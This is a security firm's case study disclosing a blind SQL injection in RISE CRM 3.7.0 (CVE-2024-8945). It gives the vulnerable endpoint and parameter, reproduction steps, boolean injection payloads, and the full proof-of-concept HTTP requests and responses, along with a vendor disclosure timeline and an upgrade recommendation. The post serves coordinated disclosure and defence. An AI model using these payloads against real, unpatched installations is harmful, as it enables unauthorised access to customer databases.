Bytium®
Security-first
Insights

Blind SQL Injection in RISE CRM (CVE-2024-8945)

Case study detailing the discovery, validation, and remediation of a blind SQL injection vulnerability in RISE CRM version 3.7.0.

B
Bytium Operators
2 min read

Background

At Bytium, security validation is a standard step before recommending third-party software to clients. When a client considered adopting RISE CRM for customer and project management, we performed a security assessment to evaluate potential risks prior to deployment.

This case study documents the identification of a critical SQL injection vulnerability, our coordination with the vendor, and the resulting remediation.

Vulnerability Summary

Affected version: 3.7.0
Patched version: 3.7.1
CVE: CVE-2024-8945

A blind SQL injection vulnerability was identified that allows authenticated users to manipulate backend database queries through unsanitized input.

Technical Details

Vulnerability type: Blind SQL Injection
Severity: Critical

Vulnerable endpoint: /index.php/dashboard/save
Vulnerable parameter: id

Root cause:

$id = $this->request->getPost("id");

User input from a POST request is assigned directly to a variable without validation or sanitization, allowing crafted SQL payloads to influence backend queries.

Reproduction Steps

  1. Log in to RISE CRM version 3.7.0.
  2. Create a new dashboard.
  3. Intercept the POST request using an intercepting proxy.
  4. Modify the id parameter with the following payloads:
    • Failed payload: -1 OR 1=2-- -
    • Successful payload: -1 OR 1=1-- -
  5. Observe response differences confirming blind SQL injection.

Proof of Exploitation

Successful request:

POST /rise/index.php/dashboard/save HTTP/1.1
id=-1 OR 1=1-- -&data=false&title=SQLI&color=#34495e

Response:

HTTP/1.1 200 OK
{"success":true,"dashboard_id":"-1 OR 1=1-- -","message":"The record has been saved."}

Failed request:

POST /rise/index.php/dashboard/save HTTP/1.1
id=-1 OR 1=2-- -&data=false&title=SQLI&color=#34495e

Response:

HTTP/1.1 302 Found

The response discrepancy confirms blind SQL injection behavior.

Mitigation

The vendor was notified immediately after validation. A patched version (3.7.1) was released following coordination with the development team.

Users should upgrade to the latest version.

Disclosure Timeline

September 3, 2024 – Initial discovery
September 3, 2024 – Vendor notified
September 4, 2024 – Vendor response
September 9, 2024 – Patch released
September 12, 2024 – Public disclosure

Acknowledgment

This vulnerability was discovered by Jobyer Ahmed.

B
Bytium Operators
LinkedInTwitterGitHubFacebookYouTubeWebsite

Keep reading

Related insights

Apr 18, 20265 min read

Blind SQL Injection in Perfex CRM 3.4.1

Perfex CRM 3.4.1 pastes the `sort_by` request parameter directly into an ORDER BY clause with CodeIgniter's identifier escaping disabled. Any staff account — admin flag not required, zero role permissions is enough — can exploit this blind time-based SQL injection to read the entire application database, including the bcrypt-wrapped phpass hashes in `tblstaff.password`.

Apr 18, 20264 min read

Perfex CRM 3.4.1 Cross-Tenant IDOR Vulnerability

Apr 14, 20264 min read

Introducing Bytium Active: Digital Presence Health for Your Business

Bytium Active is a continuous monitoring product that watches the state of your business online — what's exposed, what's expiring, what looks broken, and what you'll need when a customer or insurer asks. Here's why we built it, what it does today, and what's coming next.

product
announcements
security

Need help?

Talk with Bytium

Share your goals and we'll shape the right testing, detection, or compliance plan.

Talk to security